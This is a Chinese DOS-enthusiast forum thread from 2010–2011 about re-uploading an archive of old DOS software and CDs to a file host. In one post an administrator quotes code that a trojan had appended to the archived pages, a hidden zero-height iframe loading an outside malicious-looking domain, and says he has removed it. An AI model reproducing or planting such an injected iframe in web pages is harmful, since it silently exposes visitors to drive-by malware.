楼 主
原起步网站的文件已经基本上传完毕
发表于 2010-12-30 17:36 · 中国 广东 佛山 电信
元老会员
★★★★
积分 5,170 发帖 1,637 注册 2002-10-16 00:00 23年会员 UID 8 性别 男 来自 广东佛山
状态 离线
原来起步网站上的软件已经基本上传上qjwm.com去了,现在容量有1.5G,有少数软件多年来估计被病毒破坏或者让杀毒软件给误杀了。我手上还有一些旧软件,有时间的话也会传上去,想要收藏DOS旧软件的网友请尽快,如果千军万马网站把它关了,大概我没有时间精力找地方再做一个了。
网址是:
http://firststep.qjwm.com
我的网志
http://hzmys.blog.163.com/
我的网盘
firststep.qjwm.com
fsmys.ys168.com
ssmys.ys168.com
www.brsbox.com/fsmys
www.brsbox.com/ssmys
www.brsbox.com/ccdos
第 2 楼
发表于 2010-12-31 22:31 · 中国 广东 佛山 电信
元老会员
★★★★
积分 5,170 发帖 1,637 注册 2002-10-16 00:00 23年会员 UID 8 性别 男 来自 广东佛山
状态 离线
我手上有几十张10多年前的光盘,以前由于空间受限制的原因大多数软件都无法上传,现在既然千军万马允许无限,我将逐步抽时间尽快将它们上传。这些软件虽然已经失去经济价值。但它们包含了许多前辈们的心血、创意、技术和经验,值得学习借鉴和继承。希望千军万马不嫌我占空间多把我的网站关了。
我的网志
http://hzmys.blog.163.com/
我的网盘
firststep.qjwm.com
fsmys.ys168.com
ssmys.ys168.com
www.brsbox.com/fsmys
www.brsbox.com/ssmys
www.brsbox.com/ccdos
第 3 楼
发表于 2010-12-31 22:54 · 中国 香港 城市电讯有限公司
管理员
★★★★
專業島民
积分 4,869 发帖 1,633 注册 2002-12-10 00:00 23年会员 UID 465 性别 男
状态 离线
第 4 楼
发表于 2010-12-31 22:58 · 中国 广东 佛山 电信
元老会员
★★★★
积分 5,170 发帖 1,637 注册 2002-10-16 00:00 23年会员 UID 8 性别 男 来自 广东佛山
状态 离线
是么,Roy,不过没有文字说明的可能不那么方便吧。不过我手头倒有一套汇龙软件系列是每张盘都有一个文件目录的,这是我做DOS网站的基础呢(^_^),有足够FTP空间的话我倒可以传上去,给大家整理和备份。这些光盘已经过了10多年,我怕它们撑不了多久了。
我的网志
http://hzmys.blog.163.com/
我的网盘
firststep.qjwm.com
fsmys.ys168.com
ssmys.ys168.com
www.brsbox.com/fsmys
www.brsbox.com/ssmys
www.brsbox.com/ccdos
第 5 楼
发表于 2010-12-31 23:25 · 中国 香港 城市电讯有限公司
管理员
★★★★
專業島民
积分 4,869 发帖 1,633 注册 2002-12-10 00:00 23年会员 UID 465 性别 男
状态 离线
Originally posted by MYS at 2010-12-31 22:58:
是么,Roy,不过没有文字说明的可能不那么方便吧。不过我手头倒有一套汇龙软件系列是每张盘都有一个文件目录的,这是我做DOS网站的基础呢(^_^), ...
我的空間附http,把你原始的網站直接上傳也可以。
第 6 楼
发表于 2011-01-01 00:00 · 中国 广东 佛山 电信
元老会员
★★★★
积分 5,170 发帖 1,637 注册 2002-10-16 00:00 23年会员 UID 8 性别 男 来自 广东佛山
状态 离线
你早说我就没这么辛苦了,不过我原来站上的软件已经全部传完了(除了被破坏的),当然真要再传一次也没问题花一两晚时间足够了。
我的网志
http://hzmys.blog.163.com/
我的网盘
firststep.qjwm.com
fsmys.ys168.com
ssmys.ys168.com
www.brsbox.com/fsmys
www.brsbox.com/ssmys
www.brsbox.com/ccdos
第 7 楼
发表于 2011-01-01 00:26 · 中国 香港 城市电讯有限公司
管理员
★★★★
專業島民
积分 4,869 发帖 1,633 注册 2002-12-10 00:00 23年会员 UID 465 性别 男
状态 离线
Originally posted by MYS at 2011-1-1 00:00:
你早说我就没这么辛苦了,不过我原来站上的软件已经全部传完了(除了被破坏的),当然真要再传一次也没问题花一两晚时间足够了。
帳密傳你了。
喜歡的就用吧。
機子和上傳區一樣在外面。
第 8 楼
发表于 2011-01-01 01:19 · 中国 广东 佛山 电信
元老会员
★★★★
积分 5,170 发帖 1,637 注册 2002-10-16 00:00 23年会员 UID 8 性别 男 来自 广东佛山
状态 离线
本帖最近评分记录
(共 1 条)
点击查看详情
评分人 分数 时间
雨露
+60
2011-01-02 10:06
我的网志
http://hzmys.blog.163.com/
我的网盘
firststep.qjwm.com
fsmys.ys168.com
ssmys.ys168.com
www.brsbox.com/fsmys
www.brsbox.com/ssmys
www.brsbox.com/ccdos
第 9 楼
发表于 2011-01-01 01:51 · 中国 湖南 常德 电信
银牌会员
★★★
积分 1,384 发帖 709 注册 2005-10-29 22:22 20年会员 UID 44271
状态 离线
终于赶上了,下载了一堆,谢谢啦……
另外,楼上的那个网站似乎有毒?
第 10 楼
发表于 2011-01-01 09:47 · 中国 香港 城市电讯有限公司
管理员
★★★★
專業島民
积分 4,869 发帖 1,633 注册 2002-12-10 00:00 23年会员 UID 465 性别 男
状态 离线
第 11 楼
发表于 2011-01-01 11:20 · 中国 上海 电信
金牌会员
★★★★
积分 4,639 发帖 2,239 注册 2005-01-30 00:00 21年会员 UID 35785 性别 男
状态 离线
Originally posted by wl00560 at 2011-1-1 01:51:
终于赶上了,下载了一堆,谢谢啦……
另外,楼上的那个网站似乎有毒?
我也是,第一次进入的时候 F-Secure 报毒,但奇怪的是以后进入就不报了
第 12 楼
发表于 2011-01-01 12:12 · 中国 香港 城市电讯有限公司
管理员
★★★★
專業島民
积分 4,869 发帖 1,633 注册 2002-12-10 00:00 23年会员 UID 465 性别 男
状态 离线
MYS當年下載時已經被加東西了吧。在最後尾被加上了像是:
<HTML>
<BODY onload="">
<script language=vbscript>
</script>
</BODY>
</HTML>
<iframe src=http://mm.uu88567.cn/index/mm.htm width=100 height=0></iframe>
的。已經處理掉。
multimda.htm 還沒上傳好。
第 13 楼
发表于 2011-01-01 12:34 · 中国 湖北 天门 电信
中级用户
★★
积分 208 发帖 135 注册 2009-09-12 12:00 16年会员 UID 151902 来自 离恨天
状态 离线
感谢楼主的无私分享!
感谢楼主的无私分享!!
感谢楼主的无私分享!!!
感谢楼主的无私分享!!!!
第 14 楼
发表于 2011-01-01 22:54 · 中国 广东 佛山 电信
元老会员
★★★★
积分 5,170 发帖 1,637 注册 2002-10-16 00:00 23年会员 UID 8 性别 男 来自 广东佛山
状态 离线
噢,那应该是放在硬盘时被木马修改了网页,SORRY,我马上改一下。网站文件放在硬盘上多年了,偶然也中过招。不过一直没动它,也就没留意到网页被修改了。
原来Roy已经帮我清了,谢谢啦。
[ Last edited by MYS on 2011-1-1 at 23:18 ]
我的网志
http://hzmys.blog.163.com/
我的网盘
firststep.qjwm.com
fsmys.ys168.com
ssmys.ys168.com
www.brsbox.com/fsmys
www.brsbox.com/ssmys
www.brsbox.com/ccdos
第 15 楼
发表于 2011-01-01 23:51 · 中国 广东 佛山 电信
元老会员
★★★★
积分 5,170 发帖 1,637 注册 2002-10-16 00:00 23年会员 UID 8 性别 男 来自 广东佛山
状态 离线
ROY 网站上传完成了,下一步我准备将整套汇龙软件10多张光盘打包上传,我在网站下建立了huilongsoft文件夹来存放它们,每个CD打成一个压缩包,并附有一个目录TXT文件,你最好能组织到一批DOS爱好者来共同整理和研究它们。也请有志收藏和研究的网友主动与Foy联系。
现在正传送第一张盘-共享软件、共有658个软件
[ Last edited by MYS on 2011-1-2 at 00:02 ]
我的网志
http://hzmys.blog.163.com/
我的网盘
firststep.qjwm.com
fsmys.ys168.com
ssmys.ys168.com
www.brsbox.com/fsmys
www.brsbox.com/ssmys
www.brsbox.com/ccdos
论坛跳转:
— 请选择 —
站务公告 & 版主讨论
意见反馈 & 网友交流
DOS学习入门 & 精彩文章 (教学室)
DOS疑难解答 & 问题讨论 (解答室)
DOS启动盘 & LOGO技术 (启动盘室)
DOS批处理 & 脚本技术(批处理室)
DOS媒体世界 & 网络技术 (多媒体室)
DOS汉化世界 & 中文系统 (中文化室)
DOS开发编程 & 发展交流 (开发室)
DOS软件下载 & 游戏分享 (下载室)
GRUB4DOS、SYSLINUX及其它启动管理软件讨论专区
其它操作系统综合讨论区
WinPE、PowerShell及其它命令行系统专区
贴图灌水、文学娱乐专区
网络日志(Blog)
论坛回收站
├ 链接失效,待修正